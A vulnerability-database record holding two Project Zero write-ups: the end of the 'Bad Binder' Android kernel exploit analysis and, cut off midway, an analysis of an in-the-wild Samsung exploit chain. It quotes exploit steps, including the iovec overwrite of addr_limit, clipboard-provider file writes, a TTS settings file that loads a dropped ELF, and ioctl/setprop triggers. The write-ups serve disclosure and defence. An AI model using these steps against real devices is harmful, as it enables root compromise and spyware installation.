{\n\n1, /* iov_len */ (already used) */\n\n0xdeadbeef, /* iov_base (already used) */\n\n0x8 + 2 * 0x10, /* iov_len (already used) */\n\ncurrent_ptr + 0x8, /* next iov_base (addr_limit) */\n\n8, /* next iov_len (sizeof(addr_limit)) */\n\n0xfffffffffffffffe /* value to write - new addr_limit */\n\n}; \n \n--- \n \n** \n**\n\nTo understand how this overwrites the addr_limit, we need to remember how scatter I/O works: we will read from a unix domain socket to disparate buffers, filling up one before moving to the next. After the list_del, the scatter I/O is about to begin on the buffer at iovec[11].iov_base. The value at iovec[11].iov_base now points to the list head of the wait queue after the list_del operation. The first 5 values we are going to overwrite are our iovec structs. We originally set iovec[11].iov_len to 0x28 which means we write 0x28 bytes before moving to the buffer stored in iovec[12].iov_base. We want to overwrite iovec[12].iov_base to be the address of the addr_limit so that we can overwrite the address limit without having to overwrite everything between the list head and the address limit. This is why we set the length of the iovec[11] buffer to 0x28 bytes: 0x8 bytes each for iovec[10].iov_len, iovec[11].iov_base, iovec[11].iov_len, iovec[12].iov_base, and iovec[12].iovec_len. Then we move to write through the newly-overwritten address in iovec[12].iov_base. This writes 0xFFFFFFFFFFFFFFFE (one less than KERNEL_DS to bypass the segment_eq(get_fs(), KERNEL_DS) branch in iov_iter_init()) to the addr_limit, now making all memory (including kernel memory) accessible as part of the user-space memory range in our process and thus granting arbitrary kernel read and write. \n\n** \n**\n\nValues after list_del operation, prior to recvmsg\n\n| \n| \n\nValues after recvmsg \n \n---|---|--- \n \n0x00\n\n| \n| \n\n0x00 \n \n...\n\n| \n| \n\n... \n \n0xA8: iovec[10].iov_len \n\n+0xA8 (points to itself)\n\n| \n\nlist head\n\n\u2190 \u2192\n\n| \n\n0xA8: iovec[10].iov_len\n\n1 \n \n0xB0: iovec[11].iov_base\n\n+0xA8 (points to previous element)\n\n| \n| \n\n0xB0: iovec[11].iov_base\n\n0xDEADBEEF \n \n0xB8: iovec[11].iov_len\n\n0x28\n\n| \n| \n\n0xB8: iovec[11].iov_len\n\n0x28 \n \n0xC0: iovec[12].iov_base\n\n0xBEEFDEAD\n\n| \n| \n\n0xC0: iovec[12].iov_base\n\ntask_struct + 0x8 \n \n0xC8: iovec[12].iov_len\n\n0x8\n\n| \n| \n\n0xC8: iovec[12].iov_len\n\n0x8 \n \n \n| \n| \n \n \n| \n| \n\ntask_struct + 0x8 (addr_limit): 0xFFFFFFFFFFFFFFFE \n \n** \n**\n\n# In-the-Wild Analysis\n\nAs stated in the introduction, we deemed that there was enough credible evidence that CVE-2019-2215 was being used in the wild to support a 7-day disclosure deadline. This credible evidence included the leads and details outlined above in the \u201cHunting the Bug\u201d section, and how after a detailed review of kernel patches, all requirements perfectly aligned with one bug (and only one bug). The examined information included marketing materials for this exploit, and that the exploit was used to install a version of Pegasus. With this evidence, we decided that although we did not have an exploit sample, the risk to users was too great to wait 90 days for a patch and disclosure, and thus reported this to Android under a 7-day deadline.\n\n** \n**\n\nThe [7-day deadline](<https://www.google.com/about/appsecurity/>) exists because \u201ceach day an actively exploited vulnerability remains undisclosed to the public and unpatched, more devices or accounts will be compromised.\u201d Therefore, we decided that this vulnerability required disclosure to the public as soon as possible.\n\n# Variant Analysis\n\nI think the most important \u201cvariant\u201d that we can take away from this bug is that bugs are often patches in the upstream Linux and/or Android kernels that are not flagged as security bugs (though have security impact), so they are not included in the Android Security Bulletin and thus do not get patched in released devices. Sorting through Linux patches is a huge undertaking, so instead, one approach to address this issue could be addressed by regularly syncing with the upstream stable kernels. \n\n** \n**\n\nIn addition, we also looked for other variants where the poll handler uses wait queues that are not tied to the lifetime of the file and no issues of similar significance have been discovered so far.\n\n# Conclusion\n\nCVE-2019-2215 permits attackers to fully compromise a device with only untrusted app access or a browser renderer exploit and despite the patch being available in the upstream Linux kernel, it was left unpatched in Android devices for almost 2 years. In that time, we believe that attackers have been able to use this vulnerability to exploit users in the wild. Given the information in various public documents about the services that NSO Group provides, it seems most likely that this vulnerability was chained with either a browser renderer exploit or other remote capability.\n\n** \n**\n\nKernel vulnerabilities in Android are especially dangerous because they are largely the same across different devices, whereas other components on the device, such as the framework, SOC, or pre-installed apps, are often customized from one device to another and across different manufactures. With this single kernel vulnerability, the majority of Android devices manufactured prior to September 2018 were vulnerable. The patch gapping between the LTS Linux kernel, the Android common kernel, and the kernels running on end-users\u2019 devices leaves a ripe surface area for exploitation. To prevent issues like this, Android could force all devices to sync to both upstream Linux and the Android common kernel at a regular cadence.\n\n** \n**\n\nWe publicly disclosed CVE-2019-2215 on October 3, 2019, 7-days after reporting to Android due to credible evidence of in-the-wild exploitation. We made this determination based on documents marketing and detailing an Android exploit \u201ccapability\u201d. Our view is that it's often reasonable to infer that a vulnerability is being exploited in-the-wild from other forms of contextual information (such as the marketing materials seen in this case, combined with a deep analysis of patches) and that a binary/sample isn\u2019t always required. Therefore, each day we waited to disclose meant another day that at-risk users were exposed to harm. \n\n** \n**\n\nOn October 6, 2019, Android added updates to the October Android Security Bulletin and addressed the issue. Devices showing a security patch level on or after Oct 6, 2019 should be patched against CVE-2019-2215.\n\n** \n**\n\nThis bug highlights that in order to \u201cmake zero-day hard\u201d, we need to work to learn as much as we can from 0-days used in the wild AND share it back with the community so that we can all work together to make this kind of exploitation that much harder. Please reach out and let\u2019s collaborate!\n\n## tl;dr\n\n 1. Leads, even without samples, can help us find bugs and get security vulnerabilities patched. \n\n 2. The patch gap between released devices and the kernel leaves a ripe area for exploitation. The kernel is a key layer in Android\u2019s security model.\n\n 3. Project Zero is ramping up its in-the-wild 0day analysis work, and we're very open to collaboration. Please reach out!\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-21T00:00:00", "type": "googleprojectzero", "title": "\nBad Binder: Android In-The-Wild Exploit\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-11-21T00:00:00", "id": "GOOGLEPROJECTZERO:C92742E03566423141C670F4E6043468", "href": "https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T02:00:46", "description": "Posted by Maddie Stone, Project Zero\n\nNote: The three vulnerabilities discussed in this blog were all fixed in Samsung\u2019s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.\n\nAs defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the \u201cground truth\u201d data about the vulnerabilities and exploit techniques they\u2019re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there\u2019s been tremendous progress in vendor\u2019s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.\n\nWhile we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes. \n\nWe hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products. \n\n# The exploit sample\n\nThe Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.\n\nThe sample used three vulnerabilities, all patched in March 2021 by Samsung: \n\n 1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337\n 2. Kernel information leak via sec_log \\- CVE-2021-25369\n 3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370\n\nThe exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they\u2019re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.\n\nExamples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.\n\nThe in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we\u2019ve seen in other campaigns this year. [TAG](<https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/>) and [Project Zero](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) published detailed analyses of one of these campaigns in June. \n\n# Vulnerability #1 - Arbitrary filesystem read and write\n\nThe exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn\u2019t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user. \n\n[![Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 \$CVE-2021-25337\$: Arbitrary file read/write vulnerability via unprotected clipboard content provider \u00a0Severity: Moderate Affected versions: P\$9.0\$, Q\$10.0\$, R\$11.0\$ devices except ONEUI 3.1 in R\$11.0\$ Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnrMtDmG4HptsA4AWfg404rrysHRNHsnGwDE6LY1iWCH2ywFNiQy4qn6yuV9ONlcJ2_YilTV8pd1um42sMKqVhKQliJWco-ZF9Vq0z24fCavXMMcM6jsFLP-JDuw726K7zXOtvC5Cb4K_bWcNUkl3Y2hlWwiIGS0FOjkJNG1oWDSQ7bc9RGm6ZUQXN/s1104/image2.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnrMtDmG4HptsA4AWfg404rrysHRNHsnGwDE6LY1iWCH2ywFNiQy4qn6yuV9ONlcJ2_YilTV8pd1um42sMKqVhKQliJWco-ZF9Vq0z24fCavXMMcM6jsFLP-JDuw726K7zXOtvC5Cb4K_bWcNUkl3Y2hlWwiIGS0FOjkJNG1oWDSQ7bc9RGm6ZUQXN/s1104/image2.png>)\n\n## About Android content providers\n\nIn Android, [Content Providers](<https://developer.android.com/guide/topics/providers/content-providers>) manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are [required to implement six abstract methods](<https://developer.android.com/guide/topics/providers/content-provider-creating#ContentProvider>): query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.\n\nAccording to the [Android documentation](<https://developer.android.com/guide/topics/providers/content-provider-creating#Permissions>):\n\n \nAll applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.\n\n## The vulnerability\n\nSamsung created a custom clipboard content provider that runs within the system server. The [system server](<https://cs.android.com/android/platform/superproject/+/master:frameworks/base/services/java/com/android/server/SystemServer.java>) is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.\n\nSamsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:\n\n \nDATABASE_NAME = \u2018clipboardimage.db\u2019\n\nTABLE_NAME = \u2018ClipboardImageTable\u2019\n\nURL = \u2018content://com.sec.android.semclipboardprovider/images\u2019\n\nCREATE_TABLE = \" CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT, _data TEXT NOT NULL);\";\n\nUnlike content providers that live in \u201cnormal\u201d apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn\u2019t have a manifest for any permissions to go in. Therefore it\u2019s up to the code within the system server to do its own access checking. \n\nUPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:\n\n<provider android:name=\"com.android.server.semclipboard.SemClipboardProvider\" android:enabled=\"true\" android:exported=\"true\" android:multiprocess=\"false\" android:authorities=\"com.sec.android.semclipboardprovider\" android:singleUser=\"true\"/> \n \n--- \n \nLike \u201cnormal\u201d app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!\n\nThe ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the [openFileHelper](<https://developer.android.com/reference/android/content/ContentProvider#openFileHelper\$android.net.Uri,%20java.lang.String\$>) method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a [ParcelFileDescriptor](<https://developer.android.com/reference/android/os/ParcelFileDescriptor>) object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the [getFd](<https://developer.android.com/reference/android/os/ParcelFileDescriptor#getFd\$\$>) method to get the native file descriptor (fd) for the returned ParcelFileDescriptor. \n\npublic Uri insert(Uri uri, ContentValues values) {\n\nlong row = this.database.insert(TABLE_NAME, \"\", values);\n\nif (row > 0) {\n\nUri newUri = ContentUris.withAppendedId(CONTENT_URI, row);\n\ngetContext().getContentResolver().notifyChange(newUri, null);\n\nreturn newUri;\n\n}\n\nthrow new SQLException(\"Fail to add a new record into \" + uri);\n\n} \n \n--- \n \nThe function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn\u2019t usually be able to open on its own.\n\nThe exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.\n\nContentValues vals = new ContentValues();\n\nvals.put(\"_data\", \"/data/system/users/0/newFile.bin\");\n\nURI semclipboard_uri = URI.parse(\"content://com.sec.android.semclipboardprovider\")\n\nContentResolver resolver = getContentResolver();\n\nURI newFile_uri = resolver.insert(semclipboard_uri, vals);\n\nreturn resolver.openFileDescriptor(newFile_uri, \"w\").getFd(); \n \n--- \n \nLet\u2019s walk through what is happening line by line:\n\n 1. Create a [ContentValues](<https://developer.android.com/reference/android/content/ContentValues>) object. This holds the key, value pair that the caller wants to insert into a provider\u2019s database table. The key is the column name and the value is the row entry.\n 2. Set the ContentValues object: the key is set to \u201c_data\u201d and the value to an arbitrary file path, controlled by the exploit.\n 3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.\n 4. Get the [ContentResolver](<https://developer.android.com/reference/android/content/ContentResolver>) object that allows apps access to ContentProviders.\n 5. Call insert on the semclipboardprovider with our key-value pair.\n 6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider\u2019s openFile, which in this case simply calls openFileHelper.\n\nThe exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app\u2019s don\u2019t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can\u2019t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.\n\nThe exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.\n\nThis vulnerability is triggered three more times throughout the chain as we\u2019ll see below.\n\n## Fixing the vulnerability\n\nTo fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.\n\npublic Uri insert(Uri uri, ContentValues values) {\n\nif (Binder.getCallingUid() != 1000) {\n\nLog.e(TAG, \"Fail to insert image clip uri. blocked the access of package : \" + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));\n\nreturn null;\n\n}\n\nlong row = this.database.insert(TABLE_NAME, \"\", values);\n\nif (row > 0) {\n\nUri newUri = ContentUris.withAppendedId(CONTENT_URI, row);\n\ngetContext().getContentResolver().notifyChange(newUri, null);\n\nreturn newUri;\n\n}\n\nthrow new SQLException(\"Fail to add a new record into \" + uri);\n\n} \n \n--- \n \n## Executing the stage 2 ELF\n\nThe exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).\n\nThe [Samsung Text to Speech application (com.samsung.SMT)](<https://galaxystore.samsung.com/detail/com.samsung.SMT?langCd=en>) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used[ to gain code execution as system](<https://blog.flanker017.me/text-to-speech-speaks-pwned/>). What\u2019s different this time though is that the exploit doesn\u2019t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.\n\nOlder versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the [System.load](<https://developer.android.com/reference/java/lang/System#load\$java.lang.String\$>) API. \n\nThe exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.\n\nTo do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.\n\n<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n\n<map>\n\n<string name=\\\"eng-USA-Variant Info\\\">f00</string>\\n\"\n\n<string name=\\\"SMT_STUBCHECK_STATUS\\\">STUB_SUCCESS</string>\\n\"\n\n<string name=\\\"SMT_LATEST_INSTALLED_ENGINE_PATH\\\">/data/system/users/0/newFile.bin</string>\\n\"\n\n</map> \n \n--- \n \nThe SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context. \n\nThe exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.\n\nPhones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from [this A50 device](<https://www.sammobile.com/samsung/galaxy-a50/firmware/SM-A505F/XID/download/A505FDDS5BTJA/517463/>) on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file. \n\nOnce the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.\n\n# Vulnerability #2 - task_struct and sys_call_table address leak\n\nOnce the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.\n\nThe vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.\n\n[![Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19897 \$CVE-2021-25369\$: Potential kernel information exposure from sec_log \u00a0Severity: Moderate Affected versions: O\$8.x\$, P\$9.0\$, Q\$10.0\$ Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTUlyiPJg1awjnkx_0jTgZw-hLYtjWLrtD4kRaCW0J6sj9FGrAbEgC_nDgM36G5ctdm9r1iHukN2Wt7YivoW1znRECs_cNdoISTW_mzkF0Ylh48-zsoLsEzlWOJ8iLnSFejIzSYGG5t7lbfNMuNt3v-01FpJcWsYQmtT01kB3AQVV58nSgiCKmjqOa/s1103/image3.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTUlyiPJg1awjnkx_0jTgZw-hLYtjWLrtD4kRaCW0J6sj9FGrAbEgC_nDgM36G5ctdm9r1iHukN2Wt7YivoW1znRECs_cNdoISTW_mzkF0Ylh48-zsoLsEzlWOJ8iLnSFejIzSYGG5t7lbfNMuNt3v-01FpJcWsYQmtT01kB3AQVV58nSgiCKmjqOa/s1103/image3.png>)\n\nThe exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg. \n\noid __warn(const char *file, int line, void *caller, unsigned taint,\n\nstruct pt_regs *regs, struct warn_args *args)\n\n{\n\ndisable_trace_on_warning();\n\npr_warn(\"------------[ cut here ]------------\\n\");\n\nif (file)\n\npr_warn(\"WARNING: CPU: %d PID: %d at %s:%d %pS\\n\",\n\nraw_smp_processor_id(), current->pid, file, line,\n\ncaller);\n\nelse\n\npr_warn(\"WARNING: CPU: %d PID: %d at %pS\\n\",\n\nraw_smp_processor_id(), current->pid, caller);\n\nif (args)\n\nvprintk(args->fmt, args->args);\n\nif (panic_on_warn) {\n\n/*\n\n* This thread may hit another WARN() in the panic path.\n\n* Resetting this prevents additional WARN() from panicking the\n\n* system on this thread. Other threads are blocked by the\n\n* panic_mutex in panic().\n\n*/\n\npanic_on_warn = 0;\n\npanic(\"panic_on_warn set ...\\n\");\n\n}\n\nprint_modules();\n\ndump_stack();\n\nprint_oops_end_marker();\n\n/* Just a warning, don't kill lockdep. */\n\nadd_taint(taint, LOCKDEP_STILL_OK);\n\n} \n \n--- \n \nOn Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it\u2019s not readable by the exploit.\n\na51:/ $ ls -alZ /dev/kmsg\n\ncrw-rw\\---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg\n\n$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy\n\nallow domain dev_type:lnk_file { getattr ioctl lock map open read };\n\nallow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write }; \n \n--- \n \nSamsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log. \n\nThe WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in [release BX304L01B-SW-99002-r21p0-01rel1 in February 2020](<https://developer.arm.com/downloads/-/mali-drivers/bifrost-kernel>). However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021. \n\n/**\n\n* kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.\n\n* @filp: Non-NULL pointer to file structure.\n\n* @cmd: User command.\n\n* @arg: Command's argument.\n\n*\n\n* Return: 0 on success, else error code.\n\n*/\n\nstatic long kbasep_vinstr_hwcnt_reader_ioctl(\n\nstruct file *filp,\n\nunsigned int cmd,\n\nunsigned long arg)\n\n{\n\nlong rcode;\n\nstruct kbase_vinstr_client *cli;\n\nif (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))\n\nreturn -EINVAL;\n\ncli = filp->private_data;\n\nif (!cli)\n\nreturn -EINVAL;\n\nswitch (cmd) {\n\ncase KBASE_HWCNT_READER_GET_API_VERSION:\n\nrcode = put_user(HWCNT_READER_API, (u32 __user *)arg);\n\nbreak;\n\ncase KBASE_HWCNT_READER_GET_HWVER:\n\nrcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(\n\ncli, (u32 __user *)arg);\n\nbreak;\n\ncase KBASE_HWCNT_READER_GET_BUFFER_SIZE:\n\nrcode = put_user(\n\n(u32)cli->vctx->metadata->dump_buf_bytes,\n\n(u32 __user *)arg);\n\nbreak;\n\n[...]\n\ndefault:\n\nWARN_ON(true);\n\nrcode = -EINVAL;\n\nbreak;\n\n}\n\nreturn rcode;\n\n} \n \n--- \n \nSpecifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver\u2019s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl\u2019s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.\n\nhwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);\n\nioctl(hwcnt_fd, 0x4004BEFE, 0); \n \n--- \n \nTo trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:\n\nsetprop dumpstate.options bugreportfull;\n\nsetprop ctl.start bugreport; \n \n--- \n \nIn Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP\u2019s policy. Most notably in this exploit\u2019s case, system_app has access to set ctl_start and thus initiate the bugreport. \n\nallow at_distributor ctl_start_prop:file { getattr map open read };\n\nallow at_distributor ctl_start_prop:property_service set;\n\nallow bootchecker ctl_start_prop:file { getattr map open read };\n\nallow bootchecker ctl_start_prop:property_service set;\n\nallow dumpstate property_type:file { getattr map open read };\n\nallow hal_keymaster_default ctl_start_prop:file { getattr map open read };\n\nallow hal_keymaster_default ctl_start_prop:property_service set;\n\nallow ikev2_client ctl_start_prop:file { getattr map open read };\n\nallow ikev2_client ctl_start_prop:property_service set;\n\nallow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };\n\nallow init property_type:property_service set;\n\nallow keystore ctl_start_prop:file { getattr map open read };\n\nallow keystore ctl_start_prop:property_service set;\n\nallow mediadrmserver ctl_start_prop:file { getattr map open read };\n\nallow mediadrmserver ctl_start_prop:property_service set;\n\nallow multiclientd ctl_start_prop:file { getattr map open read };\n\nallow multiclientd ctl_start_prop:property_service set;\n\nallow radio ctl_start_prop:file { getattr map open read };\n\nallow radio ctl_start_prop:property_service set;\n\nallow shell ctl_start_prop:file { getattr map open read };\n\nallow shell ctl_start_prop:property_service set;\n\nallow surfaceflinger ctl_start_prop:file { getattr map open read };\n\nallow surfaceflinger ctl_start_prop:property_service set;\n\nallow system_app ctl_start_prop:file { getattr map open read };\n\nallow system_app ctl_start_prop:property_service set;\n\nallow system_server ctl_start_prop:file { getattr map open read };\n\nallow system_server ctl_start_prop:property_service set;\n\nallow vold ctl_start_prop:file { getattr map open read };\n\nallow vold ctl_start_prop:property_service set;\n\nallow wlandutservice ctl_start_prop:file { getattr map open read };\n\nallow wlandutservice ctl_start_prop:property_service set; \n \n--- \n \nThe bugreport service is defined in /system/etc/init/dumpstate.rc:\n\nservice bugreport /system/bin/dumpstate -d -p -B -z \\\n\n-o /data/user_de/0/com.android.shell/files/bugreports/bugreport\n\nclass main\n\ndisabled\n\noneshot \n \n--- \n \nThe bugreport service in dumpstate.rc is a Samsung-specific customization. The [AOSP version of ](<https://cs.android.com/android/platform/superproject/+/master:frameworks/native/cmds/dumpstate/dumpstate.rc;l=1?q=dumpstate.rc&sq=&ss=android%2Fplatform%2Fsuperproject>)[dumpstate.rc](<https://cs.android.com/android/platform/superproject/+/master:frameworks/native/cmds/dumpstate/dumpstate.rc;l=1?q=dumpstate.rc&sq=&ss=android%2Fplatform%2Fsuperproject>) doesn\u2019t include this service.\n\nThe Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.\n\n_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));\n\nLOBYTE(s) = 18;\n\nv650[0] = 0LL;\n\ns_8 = 17664LL;\n\n*(char **)((char *)&s + 1) = *(char **)\"DUMPSTATE\";\n\nDurationReporter::DurationReporter(v636, (__int64)&s, 0);\n\nif ( ((unsigned __int8)s & 1) != 0 )\n\noperator delete(v650[0]);\n\ndump_sec_log(\"SEC LOG\", \"/proc/sec_log\", 